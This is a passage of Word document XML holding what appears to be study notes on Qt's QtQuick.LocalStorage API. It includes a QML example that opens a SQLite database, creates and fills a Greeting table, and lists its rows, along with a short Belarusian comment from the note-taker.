          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LocalStorage</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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68181D" w:rsidRPr="0068181D" w:rsidRDefault="00490E7E"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hyperlink r:id="rId1663" w:history="1">
        <w:r w:rsidR="0068181D" w:rsidRPr="0068181D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0068181D" w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0068181D"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width</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>200</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height</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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hyperlink r:id="rId1664" w:history="1">
        <w:r w:rsidRPr="0068181D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>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text</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anchors</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horizontalCenter</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parent</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horizontalCenter</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> findGreetings</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> db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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LocalStorage</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openDatabaseSync</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"QQmlExampleDB"</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"1.0"</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"The Example QML SQL!"</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1000000</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db</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transaction</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function</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tx</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Create the database if it doesn't already exist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tx</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executeSql</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'CREATE TABLE IF NOT EXISTS Greeting(salutation TEXT, salutee TEXT)'</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Add (another) greeting row</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tx</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executeSql</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'INSERT INTO Greeting VALUES(?,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'hello'</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'world'</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Show all added greetings</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rs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tx</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executeSql</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'SELECT * FROM Greeting'</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> r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for</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> i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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</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i </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rs</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rows</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length</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i</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r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rs</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rows</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item</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i</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salutation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 "</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rs</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rows</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item</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i</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salutee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"\n"</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text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r</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</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onCompleted</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findGreetings</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The API </w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>conforms to the Synchronous API of the HTML5 Web Database API</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1665" w:history="1">
        <w:r w:rsidRPr="0068181D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>W3C Working Draft 29 October 2009</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1666" w:history="1">
        <w:r w:rsidRPr="0068181D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SQL Local Storage example</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>demonstrates the basics of using the Offline Storage API.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00464480" w:rsidRPr="00464480" w:rsidRDefault="008F1DE7" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00464480" w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Прыклад зрабіў. Усё працуе. Трэба падвучыць </w:t>
      </w:r>
      <w:r w:rsidR="00464480" w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidR="00464480" w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1350" w:name="open-or-create-a-databasedata"/>
      <w:bookmarkStart w:id="1351" w:name="_Toc483000819"/>
      <w:bookmarkStart w:id="1352" w:name="_Toc483604165"/>
      <w:bookmarkStart w:id="1353" w:name="_Toc483605385"/>
      <w:bookmarkEnd w:id="1350"/>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open or create a databaseData</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1351"/>
      <w:bookmarkEnd w:id="1352"/>
      <w:bookmarkEnd w:id="1353"/>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:hyperlink r:id="rId1667" w:history="1">
        <w:r w:rsidRPr="0068181D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">LocalStorage </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as Sql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="000821BB" w:rsidRDefault="0068181D" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">db </w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sql</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>openDatabaseSync(identifier</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> version</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> description</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> estimated_size</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> callback(db))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The above code returns the database identified by</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identifier</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If the database does not already exist, it is created, and the function</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callback</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
